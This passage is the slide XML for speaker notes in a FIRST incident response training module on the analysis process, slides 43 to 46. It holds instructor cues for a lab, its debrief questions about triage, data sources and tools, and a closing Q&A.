                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98305" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73676E92-6AA7-4F40-9816-79B4882332D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631825" y="4343400"/>
            <a:ext cx="5592763" cy="6448425"/>
          </a:xfrm>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215900" indent="-214313" eaLnBrk="1">
              <a:spcBef>
                <a:spcPct val="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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Module 5 Lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>1 minute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="215900" indent="-214313" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="363"/>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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>In this lab, we will try some data analysis in a guided scenario, and then in a scenario based on your actual work environment.</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Instructor notes: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Each lab has two parts. A guided scenario and one looking at the student’s real-world environment. After the lab is complete: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="169863" indent="-169863" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="14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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>For the guided scenario, discuss the results as you go. They should be fairly similar, although each student will make some slightly differing assumptions. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="169863" indent="-169863" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="14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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>For the real-world section, it is best to break into small teams to debrief. This is because each individual and organization will have vastly differing environments and experience. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92164" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{168615FC-59FD-5241-83B2-42D85AD985BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8928100"/>
            <a:ext cx="4954588"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92165" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F1D2FAF-F090-8A4F-92E8-BEACD23E4AC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6608763" y="8931275"/>
            <a:ext cx="247650"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{9B24A3D1-BD60-D64C-855E-BE76A558C49C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans"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4210" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BC8D35D-5600-6B46-8D07-6BE9EBA81DDC}"/>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C9DE4824-A5CD-0247-88C7-86CE834FE8B8}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99329" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91F69552-A72E-4A44-A4E0-1ED37EE5687B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631825" y="4343400"/>
            <a:ext cx="5592763" cy="6448425"/>
          </a:xfrm>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215900" indent="-214313" eaLnBrk="1">
              <a:spcBef>
                <a:spcPct val="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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Module 5 Lab Conclusion: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>4 minutes</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Now that we have finished the scenario, let’s look at the Analysis phase within your organization. Pick a moderately-complex issue you have worked on that required significant analysis. These are analysis questions to consider once you go back to your organization:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="185738" lvl="1" indent="-184150" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="363"/>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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>How does your team triage and select the top priority issues to work on at any given time? Is your method formal or informal? How do you know to change your focus?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="185738" lvl="1" indent="-184150" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="363"/>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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>First, record the initial input data that got you started investigating this issue. Then list other sources you brought into your analysis. Indicate the relationship with your initial input data. How did you discover this additional source of relevant data? Why did you decide to include it? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="185738" lvl="1" indent="-184150"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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>How did you correlate those multiple sources?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="185738" lvl="1" indent="-184150"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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>If you used internal data sources, did the interface and the underlying storage (RDBMS, NoSQL, flat files) prove to be effective for finding the information you needed? Can you explain the most important advantages or gaps in your setup?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="185738" lvl="1" indent="-184150" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>What tools available in your organization did you use? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Let</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t> learners give suggestions, then move to the next section.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94212" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF70D8AC-DEA8-6A42-8077-7A772134AF30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8931275"/>
            <a:ext cx="4954588"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94213" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFCBAB9B-43FD-5847-9D62-8338119DF91E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3886200" y="8931275"/>
            <a:ext cx="2970213"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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{4410C9EF-461E-BC4F-A592-89B3C91B17BC}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans"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6258" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95B29243-A5EA-9B4B-B7D0-E9791F1CA272}"/>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728D88B7-675D-C542-BC0E-0839BEB051B2}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96259" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A075D3A-4E3A-FE4F-8740-7023E41CCA45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631825" y="4343400"/>
            <a:ext cx="5592763" cy="64484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215900" indent="-214313" eaLnBrk="1">
              <a:spcBef>
                <a:spcPct val="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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Questions?: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>2 minutes</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Any questions?</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Ask </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>for structured feedback and put any large-scale questions or questions on a particular tangent that you don’t want to address at the moment in the “Parking Lot,” to address either after class or in a follow-up session.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="215900" indent="-214313" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="363"/>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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Segue: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Next you will learn about the Distribution process.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96260" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{558E8CF7-AECA-1B47-B001-0C77BE7F9F24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8928100"/>
            <a:ext cx="6530975"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96261" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EE8383D-6593-D84C-ACBD-F939A243374E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6608763" y="8931275"/>
            <a:ext cx="247650"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{F9856817-9973-7D4A-854E-D1F87F298D84}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans"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8306" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FBD42C6-D193-8746-BB8B-F3DAB521EB72}"/>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261AA132-149B-CF42-8643-ED29EB4D6074}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98307" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24EEB69D-A15E-824B-A500-5255AA0534A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631825" y="4343400"/>
            <a:ext cx="5592763" cy="64484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
        <p:nvSpPr>
          <p:cNvPr id="98308" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BC1B9CA-1D61-A046-9C46-0F9066986D7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6608763" y="8931275"/>
            <a:ext cx="247650"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{AF63F4CF-6AD7-CC46-AD96-2F4F926E96EF}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98309" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{978536B4-A3D0-4444-9F85-BE93208A50ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8928100"/>
            <a:ext cx="6530975"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST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338" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C241076-C1B1-0C4E-9CFD-8A81F6302E8E}"/>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B341251A-AC62-0844-BCC2-C099C5DCAD7B}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
